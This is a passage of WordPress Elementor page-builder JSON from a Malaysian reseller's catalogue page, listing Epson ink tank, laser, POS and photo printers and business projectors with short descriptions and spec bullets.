printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 